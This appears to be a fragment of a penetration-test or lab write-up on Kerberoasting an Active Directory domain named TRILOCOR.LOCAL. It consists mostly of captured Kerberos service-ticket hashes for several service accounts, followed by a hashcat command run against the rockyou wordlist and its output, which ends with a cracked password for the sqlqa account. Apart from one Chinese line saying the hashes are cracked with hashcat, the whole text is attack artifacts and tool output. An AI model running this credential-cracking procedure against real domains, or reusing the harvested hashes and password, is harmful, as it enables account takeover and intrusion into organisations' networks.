$krb5tgs$23$*sqlqa$TRILOCOR.LOCAL$trilocor.local/sqlqa*$be26e37c5b23dc418bd5f6b484d3851b$d01c5b042df427bbab25914a86f402640907cc155e02d56aacff4024c52a09d973e7e1201e61de12dfc738354a06dc24172207e719d0e04592257e2ee34b9fbd62063bee7ce3a5c4d6cbeb911edc8810a978abd104b6f3c7c8ebb6a91f25ed9a970475ffb2fcbaef7c4de6d0a93b67025f6c305ad23a792a82e9477bbbacc6dfd053e5cafa355a2fa3c908f53d11b7d03d846e84590bd5e8ed690bb656f2c93a497c379aea24ecf0cda4fa7d6e5c7349cc624e8678dda0d17cb830adb9a1e1de153fdcca1ccd4bfdda59a20e0afb5511b9c7442643f9cfa466f76cae44f64eab4a251048fe5e3d062e9feb87d4ab604594cd35e73ee96c47359aa422b59a5cf869af1a4e9d486be6a132210ce5b5ef94995e7b651ead066416e9c837e495cf74353b6f36e3f3c470abe7f818b51147a31ca605a20ac7266c503209cea0671afcc8b27391c1a5e6d79d8faad3f1b21fa75ce2b5927246bb6b47c4e5acdac032befa31a3fe2e5cccf83fbd05fcd3b64f4ea558668d3c26a89a4073453c2c93271a8bdcfd3119454a4381b2ca083c33cc63765da3d3241cd4cbce0432cff97d02437103655d1d61f9920b58726c7a0b6eb6688a2032aec22444d75a3438de5818c1070a348f486013d8145123e8c1245fac110dd4f7f5d3b22e472a40b896ca2b0d3a2ef53f51f3751db8df10a692c726a7d287dbf4797e3fb641ac678d82b7f565d7815de68f7eabadaeb9860a3a34c037e3ede2e1fe8c4728ff435669e641e46a78df7db9adbd49e954337a024ec5036caa62e1d3808e86a2f6532f21918a5e39672459deeee322354f930dcb1283e1290216832c9a755159b5cdf3b184a32a20af17dcf6a2df4c2e8b312700751af8e10a67982fca3271d666ba095b157b9c9bca1c7db8fb0a7ecc4b1b98c9da30fc17347b176d3972d0ff4255c07bc18e6e72d71051c63d20159fd5e161cb3f321dbd17722b210de1ec94be783c07754cb4f5725b8d42e9dfd1e90a96eeed947a77db42a1cfd505ff611123dbb1fdf70bc3a156a2b2dd38e985764c4347cf523526c0f6ac1dfab5b4ea9810f33d17161c87a2b1c7b0ee293b96d3de96d23943b7c62767fb98f6fc3cfb3386ade75dccd3cc90969634fb5ecbfaf10726c13866e84cce4600fac0d210550652a5cb652cccae2fde8985f199def0c15500ee3163f59a16d7c30bdd74c50265ea5cae0dc7361f1aa00845d9ff87b0facbb0bc5ca88c2b36c329d9837d654deac1b22c5d9649352f149250b3cc21a7b56b2669b0670bb760ad416a0802b70cfae0d834e49cd6eac6f1098720203ae5698cee92220910110d52f62fc7e1a89c73a53ee0443d333804c439464357bf902a4992763fa2930d429379f34036279fc36257351b4bcd178066c59044e3e8ef04d608998a7114ab5c2376292b441ced2a2733b60a3bb869d3467fc56775d8faf818215a05475a8d7f $krb5tgs$23$*sqldev$TRILOCOR.LOCAL$trilocor.local/sqldev*$1b90fa31a0978dd8606d54a0dd048507$f1093f3333b584686a281ff64dc1c1c46e47abf525cadf3b822dd69c84c4b6cbcf06960e73169afffc71ed1cc225405d4a304ba34199359d2a312d8c009ea6efb96b23cf80da3b47c247a6fa7fda1e9234157232a221b275f416f579a2e3c4d2599d1fd446c2153d836524279d911bdfddf8aa3e3baa92729e5e9f6c4c0c846be547769c80d1e105164652377c86d52bdafabea069041836bb008b23322ce2d0da782b42febc5733e9671410a48b6822468ff306670a02816d26043f0e9d41be67b7c40f0dbce40e03e220b02d58355362cc9e15e3ec2ca941eaa1f7cc82d1f8a161fdc4f6c7274992bac306f863e85b6970b1822911cfd86c8eebe2b0eabe6deb09e850a10b030d72002d6478b81eff16a0e3f29f5e21b2e4a436b431ac09a642c708d53ef7b50c116551cdc277ff530e575102896e4a3d29b670594b646aca2e273c4e996c5afc0615cee006bad6b9c5b8e7c99fdcf8c0486c17e015ba25be608f086bb177a2204822ec46877ac5c6ab657a603bc0e3de282c794ddc4a6617538e459b7cf207538e631c3e1e0e1a0d7ecc70cf0b2ffb6c1c6e348f4c6614f64aa8ac1aac02357609602718f5a125207862a83ae79fd1bc9e5c6eb845f1625cebd7e90b7198d0ac7ae3eeae760cecad7a51a27ff5d274133d57b52945d8e80ff0cddf05c0b96ff23fab634a3dcfe30a18f8399784779d3fe5b5e673e6b0cd72507dd1f629d4767c060e6646d31cc440c25d8a839778814f9ee2e0dd4a91ab20c8329cd3f1b7dad3a44ad47b3408b5f3888e1ea2544e8ceacdf33023abf52f6ed2477d94b5256dea25656ec1b0271e4996039505bee14332ae36204b1c0768b04d71e3a4d050762759f07a78a5c20c0236f4dc8e0a3bfc56f8c82e1cf4b818ea95db14f80ceb01b4fec7a5cee693ac35ed7bab29cd53662fd3318ce2b792574a64e47427f4dfe690585a6658d99ebb3041df7de32be942c4e3c14f6286d28197816b828e2abf7e77be66ca4753c1b67ad3a129bf547bffbafdc3a0e8a6a2e4d3ea6a4d283e2527eae259abfd1479825777521d4772d2a34d56fd7025139c9acb419cb18de9dcfc8b6d1a2c0a667bf0045504fdc26bc590cd4eda7c4810c1bed802c74354326f9e1cb6d6008fc5a2077a4bc0154b542c8d7e1d68a74dd30a1f3efdf56c49ea19c4df23297da3ecf375604359a7f6babaed1dc1f1dc63f1c6c2160dd60a64a05f00d58ad483d0b5acf08dfeb63ad3c5375ba2ae200dc0e12ba534bd6ef56abf3927219dfcdf5dc6568e35808ff1f996763b8789442e070c191eddb2d5dda4ba5e72f0a378300166cea3345b14aad0936ce7c5d196c4ddb7fe03279f406da40f68976553ac5776b32ebced91e05bb77c6972ff67c7b6e8247d4aa2ee44d80739e5baea7fb96cea379ac0f534d7f0d31d1f5f3be2c212b8e7487b5b1ad42a089eef092cfb07bea40171c278 $krb5tgs$23$*mssqladm$TRILOCOR.LOCAL$trilocor.local/mssqladm*$efa9a426825d3ed01c6d6eb7ab36c9c6$66fa065be398cf2ba7e24d3118a2ed122917610a2cff737e202279578b2d1991026d7363911a5ebc6e1162bfc3f44b6b321a8e208110a233ea99609a9dc6fb59ef3fe98c3deff8ed60ba80a0d86a9d49741c1f306ce473af03ca9f0e0c985e1a3d80dcd1bf539743fe2fae8bc629773ff91a25c0cf9f411a30e91b92ecf0598a0259c2f73b1649a2af34759f539cb8a7bd8509769de6f0328f2dcfbf5afb71d1cf9e7e520ccfa05c5dabae6e2cc548814d26417a7c80310c12df2c17d493c02ab7fe5a733f1c39af172626c3ffcc2def5781c8129d11a1826a8c56bf1207f21c446e7a9afbf9d735e564ac4adb18f5bb45555ee500a58aff49664422a5adbfc397950a446104d158c9983936a6b918485d55c79e33912aff8f5f6bc6448ac1a26c25fd8f5444311c39f69a2d8482261011c35bc04a994f67fc69395fe3dd0d14384bce2e6b98b30f625cfecdfbd43aa81dea8f9792596cb87aeb4633c8f539fe244a23cacb3fb792c42415d79002262eacc6a2bb718ef843f5af53dc9a9f3dd847600527c1992e6d417841b18d27c7d204e5ee789466f588fb05e065efff129bdd9b9ab9e9e442f4d45b40f4fcf581f47cdd69d76c942c0867825ed3b502098ebfe83175dc720063211b8cbf12cf503f9e740153ca62da239c8df75f1ada2bd22f0c446393dd493f5df5460c85dc9b51379acd973b99904328f38c12c6c4deffa310bfc80397cf22ff3d654f4ddc2478f9eec9f12e379f56cf665d6844832e7c02f12f8d9a3a787b0d734d33cc1794eab5882b5f06774d32c6255466d0db9ffa07ab80db23e9cafd94483b4845b587d11bf1da2432d3b1b5bc01ad575400ee22a49812ff0c8128f93cfa8c429567ce25ee49fa4f741c5047e08a474ab31a6cd7a499fe91b96265344fa4454b6387975beaf2e925efc5032dda9ef086c0707a95a6dd9a6272386de8032edb56005efa8cd2d59b28b2528aa7767d0721844e28b5bad5f148bf9b80eba811ec108b72e8012241439c864897c0ff263e5fe9bad31a1c9619a9abc0fee9835be5ce72c5c33469d062128c825fbb95a3289f91166b4cf94b7fe708b3ba53086951354304415beed2388ef0d72e6545d0bd3fee2aeba72fd24ca49a208f0820282a79e6846e9928729a452810652a478b173575461f9eb867b4adf54321d87a1dc624853edb4717547a46f36360f282cc108c039afdf43189943a2c4686f437afdbf1bf332e553f29d82ccfce06627245f7c72ace4d684a62a7a0d07eda3f67ca80a2c000352de9ae2a8afc7dc31d8d1d3fd175abf2845c40e3cd6c7897682317a614509bdf2ccbce054a0b095c4a7089bc768a6d123b7f445247f2f8fb917029b25534ea2b116782bf0f3ce840c8584ee09b1bd92e0ccbd61d2d4a34cb90042f4d3d1751b206f466d707c66f9d05a565a860fbc349c7654850a318bb9a2d7dca4c800106386a $krb5tgs$23$*svc_sql$TRILOCOR.LOCAL$trilocor.local/svc_sql*$ef880a6f5561cb4ef1274aa3c4e0a525$0241fe4bc03ff72bf6c48ad7ba3619f2e0269202c152bf20ccd5522f05f298469e6c0bd73fa91de8d42a3654e159731cdbee2bf4e8be002cc72933ee1a983060febcee3fbbaa3f9956484edbe6b0aaf8a1493987e13e186935915b9dcb220b446642259a76c6076ef31789bbf19805ae45820908efb16e5bd65e26f79d738fc94529c5d7727c86b84a280e058f8e24c81a9192d423a0d2aecbb5b5d6f2b6476167f6fbb5e7fb627540fb69bda96ce6fcc89b423072a957f7daa959317385406d9bdcc1e52890951c264eceb5208298216c3a2bb9b2787b04776eb4c5683ccb97f8f6e40842985c624f6515a0a1f8fcd23f41bf4128a95d99a1e6e9fa98b201f5a1d99f4974d0e53d2eaca1e6e0c0f52155a8796c08fcca17c5d20ed83ef3ecbdd4ed902b25af8d284758228c9756e5cdba65518a2fe17ba6b150bf6432193faa41497b1ba93cbc5dcbb08d25645edc4fa125315f2a9080e3cbf5a99f1b3711dc45c9d52024e1b352f5aa3481382e9796f1ce8747d08a0672904ec49ff37ddfbce47e895c05d19e927b4bda0647e48bae7c796d32e671334a58a6cc03d7d37b7848ead47f481b1b48f27bfad51d5643f64b1f1407b60949ee7f3460828e0d8abd7bf11726f5644c723fcefb2c532decf8fc91b1c7d946a206d6ebafb502f9fd18cda21bb76b1254385ba15d4a0b485456ebe9b8a10f447dbb6e30b5c2cd03f5bd684f4dac0fea0b3c78f471f81612c9e0322921accad3110d62ce3ed9d3c19c82f7f06c43fb2fc93c807a2a54e93b32e64aaf94771c88789d0727b6c4d788ee2b588db7d6856ab55193a5c8a319ffd3d09c2a49297ed357ecdb8890aed8f2c7cc6300d8ef7c160903368713d26dba699e8b5585eaf3c26d8dd89c0f21671173be103dced1d328382d87c1f622c6c0143af1aebe21484f9570eff6e8bbf5e956a787d42531fa96bc7d9684df6acfba7f2a6f1eb87ffb9a22804154ce5d20debe1f005a2e1a3cee7cdaf367ed81b25c00df047b0af6c6cfc7c6eb4ac16037290c20ab8671fdf4745552aafefc4c08fec0f23197fddc25a045900cdbb43e8f5de37f2936110f9abf3a0a86a5eaca275ba5a73a565e1c5fcbf97df676cbcd096fa9fe8826dd12be64a6fb5bea7ac285e930a11b2d832796068cb43529bd130ab4d8ff6aa7200347362fc3f6c96ea1819d1e7c8f7bf576906636b52e0c2bb5fa42126a456fa760fe253742da3303e4be563db3640eb6cc2a25eafc4d2967265cb47372e4622d437c4be6f1809f694c9441c68ff854782f3ed1146d40e8b0e4abd21f3d4eb6e1ddad7ed3484efc94aba8d1b4772ae0b35ae8429839b62929f7ea6748c256cd9cd96774e8f8a1bd11ffea9e9fd14e0507da05185fc4d6359f4af25301844adb33ee10930bf96d3b4e0b5c43a6367971f0c2ac44fa1cc220bcbf5e12bfcace3d73f89e9b39d3560094c82bf9bf54 $krb5tgs$23$*sqlprod$TRILOCOR.LOCAL$trilocor.local/sqlprod*$0435b9a381803ae911033c70f732ef0d$6c34f73d29df6b0f8535fb133f8961588b66c1464905493c35223c2fce7562ff6dfbb3248de3f87ba95549b9b5e8249ad3d3563241139fb65367a3ce91725f773e40b06b83216497a3f5c00744df81b9edb23587424e21fe864e56954632dbaf9a7c1af7eb42a29edc995c9a6a287ee2458c074798696c858bcf67c0416b449f388671f26cf626d5d906965607b2844738bfe5ea5709ddfd106bf55bf475ddbdc608da3dbcf6a94fd9fa58d6b1f228b7bd04d26e07a34adab417a2946037ff1240255ecc63fec1cb7be9204056b2eaf31f08afa30c92520b887f13d8960f860d90d0f8b567c0b50645997a5bc0657844eef98db59dc232a62ed02aaf00582ffd781a313c943c0eb7dfb5359631e681897714c3a6ed0fffc7f3ac8a7f63cbe18343822cbc097b9599f2083b1e43627f1d80712abb41626641ba5f04bf0eb820be0df13cc9368cbbebe79240d50def9ed216e3114db5b82f19c4f5454a4115ccabb95dcbe0627bfceaf79984ff62e8374474f2a6830d6f9b3413b4bff1ec803de6376c1a59d472d73ec6d050c214883e94f658e212395ed0778fce800318c87a1030a0af822c612d7b0efeb62743fd72edda87c6bb97732424d904392e113df5542a07f9d6121e3a61e5f75d6624ff64b51ac62632bedca5fc7ea5acf8834ab087ac581d08a3dadf90a454de62656b441e20acd38c4db83b1ceda6cff3fe362df744b1418bccd95f085475ced1a86be17272b09a99ed895e2bdb0e8bcb42f609753e9d80960ea7093b84baf31ed1919d6aae91aa304d503097bbc9af6705e461b0d3697bd7e554268e12f90e548586e33aa65b5d9edb0168e19921c6b03736717b6dcbd79ca0f94daaaca68e38781ada6edd6646a82204bcd03866678d10c269e7e9646b32f02e83f383b9a618a588d97b7a1c82dcb2424f82c046e4594df9ea6cab7b769f4d04251c4b7cccdd68bb0c3cd039d986373c224025bdc7af50e1dc0a1943cf971f2403c9b18b6c05fa7d1cece4206b04dc3cd34bd0ad6a721f423d4da74ec8fdb24570ce4446c6a2dd0c450adb544f773739192eb9d9b853849dbcdb0e4363dab23c12d1bac3c2759c190a3020895efd09d7afa642eeebe39b0478547de2e20bcfbd1e88b9aed6e02096c7ac88e840fcac0f1747d481b21f886cf83e1055a14f2bbc595403335a2cb1cd0079f80eeae2dd6856aaf16b8e16f5aa50407f758e32cf21f885efccce0d8d8940b3a6ec3be5730d70f5b408a7c5da6cc3e893f5804f105d6d9f1f268dda01204554df563405ed6631972e89c0b19945ff08c86c62bd0e1ddf18f50a64bf80f18b38f65b100a52671c238c6888e6c3f118c2905d111178f20fe3f88ea31d91b17b166f688bc95c40289b4d80f43696dcef032b189f60a1e976d93b57fcd19a4b4e58cdd381a710efd1e9dc202513e09d94064980be7eb8b2c616c4985726dc0b08f4 $krb5tgs$23$*ksalinas$TRILOCOR.LOCAL$trilocor.local/ksalinas*$286c1b92de8fffb2cc71d6e9ba30aa83$b61acb3bb009e0420e158dddf996e335363a4ce120171184e2f246ec0c34654ed749405b59e6a211cd334cee1f63855c532c073d71d6721fdcd21bcba95d6df01cbe89f421954f9bfa7db7a0509ce1bf6fb030d05e6acc95c32b167012540a86b4255c0a29bd138e6c94b12563e77b1900826b466fca682fb9452841c2f6d6b0604e6d2eebc4174de629e52d4a515c05124d7525fba2cacf609e220ce5b2cf8a0371e8fadf194bb02be18993375e095c194e2841030fb13179d60b4524ee1a06392eb8d32b5dd6df585b73f95e1cc4dc44b0d0dde2f06848c5d93fd1acfd3d4616c2d262ed40a5dbeccfd63eeee34d0624bcaf2189b3eb7d7b7e07f7247aeba7bc90100688e1bfb9137c547b401743c85bf8729e3b0ba94dacecd9a789ea402c7975bdb7249fef8c9ffa2059c44658146c80f10ea0b449ea6932511ab0403d4dd66d185e9c70ffdf4b5a6a3e0da28c1c0163d97ffeb188640364d07d03057a71fc4087667c878aa511e4dd153658097acab2da763f1e0e6b0c297349fbb9f74ebf8d638331c270d7ca4a726e02907e0b45c1b9e6d7829722fbe25eef3450f11c0c2ca504b874e1f5598bb4824306675073716c353b5755c1e8548e996897bed685b73bdcee3b2b7ed0ba7e135ecdf38de04a9c07e1cf7f32d06bbe4b0ef9e3132429c5c0a4cbb9aeecab16f355053f488c9d9efb7df820973bb00681340bd5c0486deaadf6a71aee739f9ece180f8072f71670574375d14acc3f3d35ecb9b40b8e8dee4c7a77ec9c00e45e0310967e5d015c7a7645163cfda64f110ce0ed8a17be981fa8b827138c382e50abddac5e667d58c2c19058c6f02a038f6e97fd1b36096606ce0990fcdfcada6b5915e0cf7190e5ef5f312d807118e2a8e89d861ff05b6121304d88cb6f4fd5ec077582a10bc7b1861daa1144dfd366dc9fe6e9ef5482ab757df7a2d6fdffd42ea1965f9896c9f26b199f0f37189818081f4e223406a10fa1cc3c9ab3df6af6fa4c5368aa24f35455db65caeaf4f4eed7edb58c44d65cb73267ca2db642845251b64c03a8c6e4a79460fe14edfd9205bc91a2365228a53d6f53b71b950a6bcff52b9c19c149fc9a3626b715e25fe7fc87071a3c6036ac733c72c4f957d110ac2b6765df1d6142339835c28783889f907ab3d3d4afb8a66698cca568a0621331a252f65fd5397f201947805be4899706e6e4b5290a9db630f4d74646ba2652dd5a1104e5fcd411507f153583b7913bd7ec69a5467d79476537be2f52fb3c6a9377cfe36ece25c4503f11476531d6c8541b670cff8660017869fc33d6bc09bedd3b9f218793097b0189dfa88451f19bf8dce74f1e97aff8ccc623df32788f6015f6dc05b84c27527a75c54838695e7c0716414f80dbd4137ef166803ec610f54ee8e0a3615ffccc9f0948bc8400204956768a39a5e975778383125a66fee368e4a8f8acf4d2de $krb5tgs$23$*sapsso$TRILOCOR.LOCAL$trilocor.local/sapsso*$d08a492a0e903dcb55e6e74a387ded54$e5adcd7120a773eee00657073f37ca8d4dfb9e130f2b789a731a42e5eac8eebe6813f18093656b4e5b3c65c7d38dae7b713f61657f8747a03b3e8100fdd8410fa2e5a35a0a41126155d4f2ab8e1665e8587bcec39b122c57da86e7a0f899089cd6d05e3276712b5245bf056041d771bb159fe016cf883355ff443a001c2fb4fc21306e87140b60a2221d2a7276889417c6c10b2c15503481a349450158136601ee0144e45e800a7c4fc46a01a41d01f720cca488fa2791ffb364bd03373006705eeafd92013773ab2764ab6853bf04870e04de60ca1ae6e586945472df685d2aa8cb6664a859583ca565c1c4ba28e22a2dee068052c47dfc018f7b78355c46a8cd98fe449cb6c077b7cb8f12750d989c631d6ab074a38a3eb597c657200a00b6205234d30be40d52a5447829f8d897a29dc9e532b218e57557683d640cc5671c5d2f02691f568a19470b2f01ecf381d79c01aa51b926c9366a1090387f6c7460b5b9e11727126146a0d6d519833dbc92187e5dde35aecd5febf7d31277a1ec9fdae19ded0781e0c29f223b132f3b86b395743a637c7f68fff4f732a023ce6e44a1020080eefdd2a3d11dc5faf98d6fa7b8489036760f2c0b33b42fc18a32e4ff3cbccc3453d33c8e493ee3b36a7ea8387bc97f1320eb704b6b75683c05e72f8f37234ef64e1e8ee36b04f0e8683ca7d82b0e8eb5f23c2bc76344c6df62cfaad233357b85b5a8e0d8cd6816508f5a2382478e6dfc7c3d30a521bcd0723bdae74b966acede9068eb4e74895bdff0d400c9e7b3f0b9f39930f2d55a9c24b1f09b721b793ac7f4de69b9d995169b8cc1adb1de095897cb381a883ebb9fc7745b6a3d17bd080f0ecf5f1c8088121b3cd76282fa2dabf076ca763f44980726f5a4065a04894b502a8648311315a3164cc879418679535bd88188546f3883553849e6adc4a0629807f3d2ca5522e0ad24828448957030110ed8d6c0cbc07b687e795e134c44e41354efc517e58a9a6ad33b0eb949f3e62ba71f74cf1dc75269a0aca0866da7ccda4c049c8d41f3bbc0b1dc2ac6f328742670191fc7043e985cee750fbbf48c558b41f23961b1879d434028b16cc266b94c63818e5c6ac5419d267bf034269678adee5a53fe2e3dc7ff9124be631b4216578c7fe114be40eeca485abd0e7d82c9ccc5c737f403b65069617b2e809949895b36af34cf92a21faaa59a39f86f389770a6df58b2e571ece3ee8baf6774ca31fa149ad257785dc0a5b6a2f71d807a74b3a4b5b1c75f1102afb313427331d76ec4b7e38c240eba499f3f1ebe4175b31c22c911ad67faef9f85f544ddb5ac1cec4439a0ae37d76c2167bde78f41e0d3c9fc64e87c0744ea7235de3d7cc432f9a2e86aea08be780dca1a6e00aa1e904f519cfe7811fc810a91c31daad67859f3b51c921da10fcf5680a8d4ce970cbe967c320ba55a9ebd5bbf20e12e566d $krb5tgs$23$*sapvc$TRILOCOR.LOCAL$trilocor.local/sapvc*$0416dfb7a662c9df8574c3e920c39f2d$7cfea09e8a93eb6e3811f937be9c9414e5ac4c8598b8e60817acc90f4c7e3b66063a04dfa433fd7e317044387bf39fc5a70d889db80b45208700a7eae1a1ab71e7a24f16c66e1ebc02104a3d37894563ca1bb3d0022d847eaa4c03dc713290a5796eb488907c167336490b2ab87f51f2666a5c2eab897c5c35fc77d77d99aba9a4addac570f2c8d74684ce0d9051d822662f2ae3842fa69b4773526dac5112e387f6578934da00aaca3ec956a11c25ddad5699aabb415ab1cef04250314dac56954aa2b9ae1bcbb942c7740ef199da1e4a09ea104137b922d24aae18cfd5619d249f16d4474f757f7b9ddcc7d4b9a258083afbebc1b8038fc47d8c4d1034448783ce7772fbdca7cab425f2509695781ac195248282fb02f6875405a8a4a28e94e1d891abb76fb81c734a4c156d6cf73e9b1a294957213155279ff3ec5db7c9dd97094488e55690557127362c2a7d083225f56796542a348cb2477e8528a310e968ea5563b5bdc351518f58a1332cce44af2389de23ed1d3468818679887a811246967ae799da1ab6deef25bd2c857c27cb882b983f86fe3c79672f2c7e729ecec6c5f8284648f5ac0646950c6754a132d82457430d8ef880ebb766244d2cd668b5bd3e4e0c161cc13a412452d78cbd55246e9e9492beec3a7eae4ea4a8a5a9b403e0685ff03b2f65a20cf1fd7dc1e46a84f806a24b631f0a3bdd8e1e07e2eb4568efaf5093c5d78f198e144f77be9530c8aec264f3c7ae673db95a6be1b84b0a0169f077adc6e2a661dc21fc78f9c9fea0ec1541476e6016905e8f3895ab94d8054df1485220fc2690cca03c72d1277666b07f80b0ff499b8bc5a4502223389fa0e05df3287d81dc81218c4e121c5bfa65be707402835f85369bb30727f8c27f39ca228e4e030fe10c3beb9ec71a5e3b1c04c928a854f35d54898099dab4985a492bf3a7fdce90f731c698f7c1f5b463936908512c74727ed9e59b632f8e34cb264ec3176c46a8707257177111b549d98965bb485a3c4cfaf6f26df0d5d4e793ca6828b342bf37ccad80bc23fa1ef5a6672b5b40ef569f1e4163c33725375ff8778d4701cd72f44375562836df6fc0b396411a18f861780432b8218b298e769973f33edb00a0053188780394313633f1c3b3899588b498561847889015a2c6cf3b7ee783d555d3856220f8426ab03c69b521b08ec38fe0f56a367588983ec8553570659c923ef0173b6522fc75e6a0a8aa161ca06a4fd7dee6d409697e47db3b2bfb8c10a760dbc39d87aed0416e1dd1e4123f808a9c46b22e00a0e8da0f69b7893a32e1983887999489ddab3a3f828735290e54ea3a4aaf483e12545f98b224acad892e77c4f54236fdb7ab14a30c80a5ac5c62cc5707032df5cc5cc0d631f1e5774c73784dee9ffa1f918b4f6c9ba49e170a3e978983a1b910619fc746887f63dd1e70f94eeb163be7f91aa4ee9a34 $krb5tgs$23$*vmwarescvc$TRILOCOR.LOCAL$trilocor.local/vmwarescvc*$295832f3e09e01a68c6715131b4b3e21$28cb91b882d64e70060f417d1fa676d935f9bc90fc268eea934366c176aae4e5922e4db397faf14d36b5dbbc93cef1936506035a9646242e412bf8d4c17703471baf7c63a2e0cd116aab51840e44f742c1caa2b6ecd365820e5da881262e16745e2a7a46ab5a6ae098fcfc649182542a8c18b6797401a90fafc0fd3b72b881751d73251a593266cf2af5547725a6ab7b38400f697f74b0f66f2e2ee26b70cbd8ab8ab5c2e0cd0b18c79166da7c111ab740c77dd7f5b867f0160b234e6f5a3deb90175cb36796089f984f70daad7eaefa188a5f50590333665f2acba6befea3762ab3f3b7b1761461b7ac017c8a986fa19f005dc25492e17da488c34e11509e52d3694feb8df3d23fe29b9e27152df3959b717ce8b7094e559a7ed80074b2b7b2f0e94573fc9ecdc685865bd98ae1b9792ac4da56d0090d8eb354e43cb764b3410190c51b245e543b003e11f3cddb727cb668430767f39dd6c66b1046cf592f5a72f8e2f8554a49da3b8868124512e11cc5ea33454870ce3b2e22fc89b0a20b220caae6c4a6f8b9a46d62943623309de28c8ffb2f4c2906729ad75e537c44c2e278d8796b51672b710a303c2536aac042a463229758ea9c8b5bc0e166be18d88138038c1fa0c7a544bebcbe44c136dec51745b24f3f21144fcf889da0b319a4c6e41f57d7cbd7e7b9ecfca3804123660b5c52e3bd939c359ce820456055449ba24b82a13c8e37de8fca6adc5e3ca34186249a6511c4b82ea8d1f374cba53bdb8443b9462478f35b67c48ef518b16cadd37445b08f95c6267b38477d77516879cc9356f3bcfa95e1bb6f6f75b537ef1e2d433970ad01e567c81465e669a804f658c4b75a22dced9a13641683a297556c1586348d32cbe1a1c038bc8085793c255107439a6d7b6282c5ac9b0721338d3758642e9d2e9ea7f51241617997332eefedad2f2376cfb19b3ac048574127cafd28d0fbc540c6ccdbb2973c73e37f1fa2623f8e5ad596782cd1fb7782d0e0d1c4af918c78b1603a3cc2dca423898c45390ea1c237763cd56a48e9264a2f397e1c77199d15bf2bb52893bf8da52069f123ce0fc4368b46895f807ac97d2a98661c6f8516e38590a437077fffd2cba65f1d5c80db94fddcb15c3103a9819c18789cee4580f1bc32e4ff9df6d24c5c49c7a22442f3195245c1f66dc2de6c07a9e7a0a87cd52b140dd25ca95e0957e49210d5963bbd30b18bbba380755086e50bd4878c37213248b5aecf3649db7009d521d5160fcfea538ee1b426211b34d714645764252f6a2bf7630ffe7a8caccb56a6348a1ab1cec93e12a450b05961d2cee1d9e451add7fbf2075026046aece9eb7ba458cac89e0e7d690e89040c042f1bd38dae023e65a19b20512bf9df581762c588e76a5a1ad3165b0047188defbc7dfe5da152067cd812180ee51418cea467929b4fa6fd80440010e2ad504afd7b9910fcb1
使用 hashcat 破解 hashes
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 $ hashcat -m 13100 ksalinas-kerberosating.hashes /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project] ==================================================================================================================================== * Device #1: cpu--0x000, 1437/2938 MB (512 MB allocatable), 2MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 13 digests; 13 unique digests, 13 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Not-Iterated ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 0 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 $krb5tgs$23$*sqlqa$TRILOCOR.LOCAL$trilocor.local/sqlqa*$be26e37c5b23dc418bd5f6b484d3851b$d01c5b042df427bbab25914a86f402640907cc155e02d56aacff4024c52a09d973e7e1201e61de12dfc738354a06dc24172207e719d0e04592257e2ee34b9fbd62063bee7ce3a5c4d6cbeb911edc8810a978abd104b6f3c7c8ebb6a91f25ed9a970475ffb2fcbaef7c4de6d0a93b67025f6c305ad23a792a82e9477bbbacc6dfd053e5cafa355a2fa3c908f53d11b7d03d846e84590bd5e8ed690bb656f2c93a497c379aea24ecf0cda4fa7d6e5c7349cc624e8678dda0d17cb830adb9a1e1de153fdcca1ccd4bfdda59a20e0afb5511b9c7442643f9cfa466f76cae44f64eab4a251048fe5e3d062e9feb87d4ab604594cd35e73ee96c47359aa422b59a5cf869af1a4e9d486be6a132210ce5b5ef94995e7b651ead066416e9c837e495cf74353b6f36e3f3c470abe7f818b51147a31ca605a20ac7266c503209cea0671afcc8b27391c1a5e6d79d8faad3f1b21fa75ce2b5927246bb6b47c4e5acdac032befa31a3fe2e5cccf83fbd05fcd3b64f4ea558668d3c26a89a4073453c2c93271a8bdcfd3119454a4381b2ca083c33cc63765da3d3241cd4cbce0432cff97d02437103655d1d61f9920b58726c7a0b6eb6688a2032aec22444d75a3438de5818c1070a348f486013d8145123e8c1245fac110dd4f7f5d3b22e472a40b896ca2b0d3a2ef53f51f3751db8df10a692c726a7d287dbf4797e3fb641ac678d82b7f565d7815de68f7eabadaeb9860a3a34c037e3ede2e1fe8c4728ff435669e641e46a78df7db9adbd49e954337a024ec5036caa62e1d3808e86a2f6532f21918a5e39672459deeee322354f930dcb1283e1290216832c9a755159b5cdf3b184a32a20af17dcf6a2df4c2e8b312700751af8e10a67982fca3271d666ba095b157b9c9bca1c7db8fb0a7ecc4b1b98c9da30fc17347b176d3972d0ff4255c07bc18e6e72d71051c63d20159fd5e161cb3f321dbd17722b210de1ec94be783c07754cb4f5725b8d42e9dfd1e90a96eeed947a77db42a1cfd505ff611123dbb1fdf70bc3a156a2b2dd38e985764c4347cf523526c0f6ac1dfab5b4ea9810f33d17161c87a2b1c7b0ee293b96d3de96d23943b7c62767fb98f6fc3cfb3386ade75dccd3cc90969634fb5ecbfaf10726c13866e84cce4600fac0d210550652a5cb652cccae2fde8985f199def0c15500ee3163f59a16d7c30bdd74c50265ea5cae0dc7361f1aa00845d9ff87b0facbb0bc5ca88c2b36c329d9837d654deac1b22c5d9649352f149250b3cc21a7b56b2669b0670bb760ad416a0802b70cfae0d834e49cd6eac6f1098720203ae5698cee92220910110d52f62fc7e1a89c73a53ee0443d333804c439464357bf902a4992763fa2930d429379f34036279fc36257351b4bcd178066c59044e3e8ef04d608998a7114ab5c2376292b441ced2a2733b60a3bb869d3467fc56775d8faf818215a05475a8d7f:Password1! 